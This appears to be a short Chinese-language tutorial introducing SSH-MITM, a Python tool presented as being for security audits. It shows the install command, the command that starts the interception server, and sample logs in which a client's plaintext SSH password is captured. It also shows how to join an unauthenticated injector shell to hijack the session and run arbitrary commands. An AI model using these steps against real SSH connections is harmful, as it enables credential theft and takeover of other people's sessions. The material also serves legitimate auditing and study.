SSH-MITM是什么工具

這篇文章給大家分享的是有關(guān)SSH-MITM是什么工具的內(nèi)容。小編覺得挺實(shí)用的，因此分享給大家做個(gè)參考，一起跟隨小編過來看看吧。

SSH-MITM-攔截SSH流量

SSH-MITM服務(wù)器專為安全審計(jì)而設(shè)計(jì)，支持公鑰認(rèn)證、會(huì)話劫持和文件篡改等功能。需要注意的是，該工具基于Python語言開發(fā)，因此需要在主機(jī)設(shè)備上安裝并配置好Python環(huán)境。

SSH-MITM安裝

在使用任何軟件包之前，我們都需要進(jìn)行正確的安裝。如需安裝SSH-MITM，我們只需要在設(shè)備上打開命令行終端，然后運(yùn)行下列命令即可：

$ pip install ssh-mitm

工具使用

SSH-MITM的使用非常簡(jiǎn)單，如果需要密碼認(rèn)證或會(huì)話劫持，只需要開啟攔截MITM-SSH服務(wù)器即可。打開命令行終端，然后運(yùn)行下列命令:

$ ssh-mitm --remote-host 192.168.0.x

接下來，我們嘗試跟SSH-MITM服務(wù)器建立連接。SSH-MITM服務(wù)器會(huì)監(jiān)聽10022端口：

$ ssh -p 10022 user@proxyserver

此時(shí)，我們將會(huì)看到憑證信息在日志中輸出：

2021-01-01 11:38:26,098 [INFO]  Client connection established with parameters:

    Remote Address: 192.168.0.x

    Port: 22

    Username: user

    Password: supersecret

    Key: None

Agent: None

會(huì)話劫持

獲取明文憑證信息僅僅只是SSH-MITM的其中一個(gè)功能而已，當(dāng)客戶端成功連接之后，SSH-MITM會(huì)開啟一個(gè)新的服務(wù)器，并用于會(huì)話劫持：

2021-01-01 11:42:43,699 [INFO]  created injector shell on port 34463. connect with: ssh -p 34463 127.0.0.1

在劫持會(huì)話的時(shí)候，我們可以選擇自己喜歡的SSH客戶端。需要注意的是，這個(gè)連接不需要任何身份驗(yàn)證：

$ ssh -p 34463 127.0.0.1

建立連接之后，你的會(huì)話只會(huì)通過最新的響應(yīng)信息來更新，但是我們?nèi)匀豢梢詧?zhí)行任意命令。

接下來，我們就可以在劫持的會(huì)話或原始會(huì)話中嘗試執(zhí)行某些命令了。

命令的執(zhí)行結(jié)果將輸出顯示在兩個(gè)會(huì)話中。

感謝各位的閱讀！關(guān)于“SSH-MITM是什么工具”這篇文章就分享到這里了，希望以上內(nèi)容可以對(duì)大家有一定的幫助，讓大家可以學(xué)到更多知識(shí)，如果覺得文章不錯(cuò)，可以把它分享出去讓更多的人看到吧！